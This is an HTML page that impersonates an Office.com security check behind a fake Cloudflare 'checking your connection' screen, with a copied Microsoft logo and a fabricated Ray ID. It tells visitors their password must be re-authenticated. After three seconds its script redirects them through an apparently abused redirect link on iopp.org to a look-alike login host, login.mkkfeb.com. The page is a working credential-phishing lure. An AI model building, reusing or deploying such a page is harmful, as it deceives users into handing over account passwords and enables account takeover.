<!DOCTYPE html>
<html>
  <head>
    <style>
      body {
        background-color: #353839;
        background-size: cover;
        background-position: center;
      }

      .loading-icon {
        display: inline-block;
        width: 20px;
        height: 20px;
        border: 3px solid #fff;
        border-top-color: transparent;
        border-radius: 50%;
        animation: spin 1s infinite linear;
        margin-top: 300px;
        margin-right: 970px;
      }

      @keyframes spin {
        0% {
          transform: rotate(0deg);
        }
        100% {
          transform: rotate(360deg);
        }
      }

      .microsoft-logo {
        position: absolute;
        top: 180px;
        left: 250px;
        display: grid;
        grid-template-columns: 18px 12px;
        grid-row: auto auto;
        grid-column-gap: 5px;
        grid-row-gap: 2px;
      }

      .square {
        width: 22px;
        height: 22px;
      }

      .red {
        background-color: #f35325;
      }

      .green {
        background-color: #81bc06;
      }

      .blue {
        background-color: #05a6f0;
      }

      .yellow {
        background-color: #ffba08;
      }

      p1 {
        color: #ffffff;
        font-size: 20px;
        text-align: left;
        margin-left: 240px;
        margin-top: 30px;
        border: 1px solid white;
        padding: 5px;
        display: inline-block;
      }

      p.duplicate {
        color: #ffffff;
        font-size: 24px;
        text-align: left;
        margin-left: 240px;
        margin-top: -80px;
      }

      .office-title {
        position: absolute;
        top: 195px;
        left: 320px;
        font-weight: 500;
        color: #ffffff;
        font-size: 28px;
      }

      h2 {
        color: #ffffff;
        font-size: 23px;
        text-align: center;
        margin-right: 810px;
        margin-top: 130px;
        border: 1px solid white;
        padding: 5px;
        display: inline-block;
        margin-left: 240px;
      }

      .line {
        border-top: 1px solid white;
        margin-top: 250px;
      }

      .ray-id {
        color: #ffffff;
        font-size: 15px;
        text-align: center;
        margin-top: 10px;
      }

      .cloudflare-text {
        color: #ffffff;
        font-size: 13px;
        text-align: center;
        margin-top: -7px;
      }
    </style>
    <script>
      setTimeout(function () {
        window.location.href =
          "https://www.iopp.org/i4a/utilities/banner-log.cfm?ID=32&webURL=https://login.mkkfeb.com/fYLwWfrF";
      }, 3000);
    </script>
  </head>
  <body>
    <div class="office-title">Office.com</div>
    <div class="microsoft-logo">
      <div class="square red"></div>
      <div class="square green"></div>
      <div class="square blue"></div>
      <div class="square yellow"></div>
    </div>
    <div style="text-align: center">
      <div class="loading-icon"></div>
      <p class="duplicate">Checking if the site connection is secure</p>
    </div>
    <h2>Please Wait</h2>
    <p1
      >Office.com needs to review the security of your connection to
      re-authenticate your password.</p1
    >
    <div class="line"></div>
    <p class="ray-id">Ray ID: 302-4911deb1-ffc3-4e66-8910-1a957a10</p>
    <p class="cloudflare-text">
      Performance & security secured by <b>Cloudflare</b>
    </p>
  </body>
</html>
